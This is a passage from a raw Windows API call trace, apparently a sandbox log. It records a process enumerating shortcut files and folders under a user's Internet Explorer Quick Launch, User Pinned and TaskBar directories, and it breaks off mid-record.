ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x5a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0165.953] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5021c250, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5021c250, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x502423b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0165.953] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0165.953] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0165.953] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0165.953] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.953] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e304) returned 1 [0165.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e564) returned 1 [0165.954] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0165.954] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", nBufferLength=0x58, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpFilePart=0x0) returned 0x57 [0165.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4c8) returned 1 [0165.954] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0165.954] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", nBufferLength=0x58, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpFilePart=0x0) returned 0x57 [0165.954] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\*"), lpFindFileData=0x5a0e278 | out: lpFindFileData=0x5a0e278*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4c8) returned 1 [0165.955] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0165.959] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", nBufferLength=0x58, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpFilePart=0x0) returned 0x57 [0165.960] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\*"), lpFindFileData=0x5a0e278 | out: lpFindFileData=0x5a0e278*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.960] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.960] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0165.960] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0165.960] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.961] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e284) returned 1 [0165.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4e4) returned 1 [0165.961] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.961] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0165.961] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0165.961] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e2cc | out: lpFindFileData=0x5a0e2cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 0 [0165.961] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e284) returned 1 [0165.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e4e4) returned 1 [0165.964] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6d [0165.964] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", nBufferLength=0x6d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpFilePart=0x0) returned 0x6c [0165.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.964] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6d [0165.965] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", nBufferLength=0x6d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpFilePart=0x0) returned 0x6c [0165.965] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.965] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6d [0165.965] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", nBufferLength=0x6d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpFilePart=0x0) returned 0x6c [0165.965] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.966] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.966] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0165.966] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.966] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.966] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0165.966] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.967] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0165.967] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpFilePart=0x0) returned 0x5f [0165.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.967] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0165.967] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpFilePart=0x0) returned 0x5f [0165.967] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.968] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0165.968] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpFilePart=0x0) returned 0x5f [0165.968] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.968] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d9c8360, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0x4d9c8360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.968] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f125f50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.968] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f5210, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f0f5210, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7ee60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0165.968] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f10d8b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f10d8b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f125f50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f125f50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0165.969] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, 